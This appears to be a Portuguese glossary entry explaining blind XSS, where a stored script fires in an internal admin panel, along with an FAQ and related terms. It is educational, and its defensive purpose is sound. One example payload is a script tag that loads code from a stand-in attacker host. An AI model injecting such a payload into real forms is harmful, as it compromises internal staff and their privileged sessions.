XSS Cego
O que é XSS Cego?
XSS CegoVariante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno.
O XSS cego é uma subclasse do XSS armazenado em que o script malicioso não executa no navegador do atacante, mas num contexto diferente, normalmente privilegiado — a visualização de um ticket de suporte, uma consola de revisão de fraude, um painel interno ou um relatório de backup. O atacante submete a carga através de um formulário público (contacto, registo, suporte) e aguarda que um utilizador interno renderize os dados. A deteção depende de callbacks fora de banda: a carga exfiltra informações para XSS Hunter, Burp Collaborator ou um servidor DNS/HTTP próprio. As defesas são as do XSS armazenado mais uma CSP rigorosa nas ferramentas internas.
● Exemplos
- 01
Um campo de formulário de suporte com <script src=https://x.atacante/x.js></script> que executa no CRM do agente.
- 02
Um cabeçalho User-Agent registado num visualizador de logs administrativo que não codifica HTML.
● Perguntas frequentes
O que é XSS Cego?
Variante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa XSS Cego?
Variante de XSS armazenado em que a carga útil dispara num contexto que o atacante não consegue ver, geralmente um painel administrativo interno.
Como funciona XSS Cego?
O XSS cego é uma subclasse do XSS armazenado em que o script malicioso não executa no navegador do atacante, mas num contexto diferente, normalmente privilegiado — a visualização de um ticket de suporte, uma consola de revisão de fraude, um painel interno ou um relatório de backup. O atacante submete a carga através de um formulário público (contacto, registo, suporte) e aguarda que um utilizador interno renderize os dados. A deteção depende de callbacks fora de banda: a carga exfiltra informações para XSS Hunter, Burp Collaborator ou um servidor DNS/HTTP próprio. As defesas são as do XSS armazenado mais uma CSP rigorosa nas ferramentas internas.
Como se defender contra XSS Cego?
As defesas contra XSS Cego costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para XSS Cego?
Nomes alternativos comuns: XSS fora de banda.
● Termos relacionados
- attacks№ 240
Cross-Site Scripting (XSS)
Vulnerabilidade web que permite a um atacante injetar scripts maliciosos em páginas visitadas por outros utilizadores, executados no browser da vítima sob a origem do site.
- attacks№ 1107
XSS Armazenado
Vulnerabilidade persistente de cross-site scripting: o script do atacante é guardado no servidor e executado no navegador de cada visitante.
- attacks№ 912
XSS Refletido
XSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima.
- attacks№ 347
XSS Baseado em DOM
Variante de XSS em que a injeção e a execução ocorrem inteiramente no navegador porque JavaScript do cliente escreve dados não confiáveis num sink perigoso.
- appsec№ 214
Política de Segurança de Conteúdo (CSP)
Cabeçalho HTTP que informa ao navegador quais origens de scripts, estilos, frames e outros conteúdos são permitidas, limitando o impacto de XSS e injeções de dados.
- appsec№ 773
Codificação de saída
Transformação de dados não confiáveis em uma forma segura para um contexto de saída específico (HTML, JavaScript, URL, SQL, shell) para que não escapem e sejam executados como código.